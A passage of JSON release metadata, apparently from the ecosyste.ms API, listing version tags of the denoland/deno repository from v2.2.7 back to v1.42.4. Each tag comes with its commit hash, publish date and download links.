load_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/